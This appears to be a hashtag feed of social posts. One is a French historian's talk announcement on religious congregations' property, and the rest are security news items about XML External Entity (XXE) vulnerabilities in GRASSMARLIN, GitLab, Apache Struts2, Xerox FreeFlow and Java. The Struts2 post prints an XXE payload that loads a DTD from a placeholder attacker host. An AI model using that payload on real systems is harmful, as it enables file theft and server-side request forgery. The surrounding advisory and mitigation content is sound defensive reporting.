Dans les débats houleux sur la place des congrégations et le statut à leur octroyer, à la charnière des XIXe et XXe siècles en France, la question du patrimoine a guidé politiques et législateurs - le fameux "milliard des congrégations" de Waldeck-Rousseau. À plus d'un siècle de distance, dans les recherches et études, cette gestion du patrimoine, par l'administration française comme par les congrégations religieuses, reste peu étudiée.

Retour sur quelques-uns de ces enjeux cette semaine, où j'interviens sur « Interdictions, liquidations et saisies : les stratégies patrimoniales des congrégations enseignantes face à la législation anticongréganiste (France, 1880-1940) » lors d'un colloque organisé par l'Université de Sherbrooke sur la gestion du patrimoine religieux.
Occasion de replonger dans certains aspects et documents liés directement à mon travail de thèse (disponible en ligne sur HAL).

https://www.usherbrooke.ca/sodrus/evenements/colloque-annuel

#religious_studies #SciencesSocialesDesReligions #France #CongregationReligieuse #religion #XIXe #XXe #patrimoine

CISA Warns of Data Theft Bug in NSA-Built OT Networking Tool

A critical vulnerability, CVE-2026-6807, has been discovered in an NSA-built networking tool that could allow hackers to steal sensitive information by exploiting an XML parsing weakness. If left unpatched, this flaw could lead to devastating data breaches.

https://osintsights.com/cisa-warns-of-data-theft-bug-in-nsa-built-ot-networking-tool?utm_source=mastodon&utm_medium=social

#Cve20266807 #XmlExternalEntity #Xxe #Grassmarlin #Nsa

Gitlab, A Foxy Recipe For Success — An XXE & A Mouth-Watering $66,000 Bounty
This vulnerability was a combination of XML External Entity (XXE) Injection and Cross-Site Scripting (XSS). The application used an external library without proper input validation, allowing the researcher to inject malicious XML payloads. By exploiting this XXE, they could read arbitrary files from the server's file system, including sensitive configuration files containing internal API keys. Additionally, the XXE triggered an XSS vulnerability when outputting the parsed XML content, enabling attackers to execute arbitrary JavaScript in the victim's browser. The researcher received a $66,000 bounty for discovering this critical flaw. To mitigate such attacks, ensure proper input validation of external libraries and restrict access to sensitive files through the use of least privilege principles. Key lesson: Validate inputs at multiple layers, and don't trust third-party libraries blindly. #BugBounty #Cybersecurity #WebSecurity #XXE #XSS

https://medium.com/@justas_b_2/gitlab-a-foxy-recipe-for-success-an-xxe-a-mouth-watering-66-000-bounty-595e0f9cd611?source=rss------bug_bounty-5

CVE-2025-68493: Apache Struts2 XWork-Core XXE

Technical Breakdown: Our AI agent - ZAST.AI uncovered an XXE flaw in com.opensymphony.xwork2.util.DomHelper.parse(). The root cause is a raw SAXParserFactory initialization that lacks security feature flags: factory.setFeature("http://xml.org/sax/features/external-general-entities", false); // MISSING

Attack Vector: By manipulating the InputSource, an attacker can inject a malicious DTD.
- Payload: <!ENTITY % dtd SYSTEM "http://attacker/evil.dtd">
- Result: Full LFI (e.g., /etc/passwd, win.ini) and SSRF capabilities.

Status: Assigned CVE-2025-68493.

Affects Struts2 <= 6.0.3. Patching is critical.

🔗 Vulnerability reports: https://cwiki.apache.org/confluence/display/WW/S2-069

#XXE #CyberSecurity #ZAST #CVE #ApacheStruts2

Very well written breakdown of the discovery and patching of xxe and ../ in Xerox FreeFlow.

https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/

#cve #xxe

Уязвимости XXE в разрезе Java

В этой статье мы рассмотрим дефект безопасности XXE в контексте Java. Поговорим о причинах возникновения и возможных последствиях, посмотрим на примеры и, конечно, обсудим способы защиты.

https://habr.com/ru/companies/axiomjdk/articles/934388/

#XXE #Java #XML #security #информационная_безопасность #axiomjdk #axiom_jdk #openjdk #libercat